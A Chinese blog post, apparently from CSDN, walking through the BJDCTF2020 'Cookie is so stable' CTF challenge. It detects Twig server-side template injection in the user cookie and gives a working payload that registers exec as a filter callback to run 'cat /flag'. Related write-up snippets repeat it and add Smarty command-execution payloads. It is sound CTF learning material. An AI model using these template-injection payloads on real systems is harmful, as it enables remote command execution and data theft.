[BJDCTF2020]Cookie is so stable

最新推荐文章于 2024-09-12 09:29:20 发布
最新推荐文章于 2024-09-12 09:29:20 发布
阅读量1.8k 收藏 12
点赞数 2
分类专栏: CTF刷题记录 文章标签: web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/115442449
版权
"本文详细解析了如何利用Twig模板注入(SSTI)进行攻击的过程。通过分析flag.php和hint.php,发现存在模板注入漏洞。在确认是Twig模板而非Jinja2后,利用了call_user_function方法,构造payload为{{_self.env.registerUndefinedFilterCallback("exec")}
摘要由CSDN通过智能技术生成

考查的地方:模板注入,利用Twig模板本身的特性进行攻击

目录

解题过程

参考文章

解题过程

打开题目是这样的,页面有flag,hint

先来看看flag.php,嘶。。。需要输入ID进行登录

看看另一个hint.php,一个简单的东西

抓包分析,既然是hint.php,那就肯定会有线索,如下,提示我们注意看cookie

所以回到flag.php,先输入admin,然后登录,回显:

在登录的状态下,刷新flag.php,进行抓包

后来发现继续尝试,是个模板注入(SSTI)。放出图片

尝试{{7*7}}, 返回49

尝试{{7*'7'}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板

本题是Twig模板

然后根据大佬的wp,得到payload

但是大多数的博客没有提到这个payload是怎么来的,所以继续找,找到了相关文章(这是Twig部分,还有许多其他相当好的部分):

一篇文章带你理解漏洞之SSTI漏洞/#2-Twig

这个函数中调用了一个 call_user_function 方法

public function getFilter($name)
{
        [snip]
        foreach ($this->filterCallbacks as $callback) {
        if (false !== $filter = call_user_func($callback, $name)) {//注意这行
            return $filter;
        }
    }
    return false;
}

public function registerUndefinedFilterCallback($callable)
{
    $this->filterCallbacks[] = $callable;
}

我们只要把exec() 作为回调函数传进去就能实现命令执行了

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}

{{_self.env.getFilter("id")}}

所以payload至于要将"cat /flag" 替换"id" 即可。payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

参考文章

1. BJDCTF2020/BUUCTF-WEB:Cookie is so stable(Twig模板注入)

2. 一篇文章带你理解漏洞之SSTI漏洞/#2-Twig

【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 377
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
weixin_45577185的博客
09-06 381
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 815
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable1
最新发布
zhi741的博客
09-12 466
得出flag 在这里我进行说明一下语句:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}:服务器端在接收用户输入后,未经充分处理就直接将其作为模板内容的一部分进行处理. 就可以猜测它是SSTI注入。什么都有没有,这下又卡住了,于是我将目光转向了题目,题目中也有Cookie的身影于是乎就有了。#获取过滤器:{{_self.env.getFilter("id")}}
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 571
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3667
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2815
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3345
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2925
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
[BJDCTF2020]Cookie is so stable 1
weixin_44477223的博客
04-13 1432
运用的知识点 SSTI注入 题目 解题 一开始看到题目提示cookie 先抓一个包试试 没发现什么问题,点开另一个网页 感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么 联想到SSTI注入,构造PL进行尝试: 发现确实能够利用SSTI 判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 发现不是在这里绕过,我们抓取一个登录的包
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 904
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
2020/7/19 - [BJDCTF2020]Cookie is so stable - twg服务器端模板注入
抒情诗
07-20 390
这是道服务器端模板注入,过段时间总结一下各种payload到一篇文章里。 测试ssti漏洞的payload为 {{7*'7'}} 如果返回的是49就是twg注入,7777777是jinja2(这个我还没实验,摘自他人文章) 返回的是49,说明是twg模板,下面是固定的测试twg注入的payload, 一篇文章带你理解漏洞之 SSTI 漏洞 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
cookie is nil
07-27
当你在编程中遇到 "cookie is nil" 的情况,通常意味着某个变量 `cookie` 被设置成了 `null` 或者空值,在许多编程语言中,包括JavaScript,它是一个表示未初始化、不存在或者已被删除的对象引用。当尝试访问这样一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值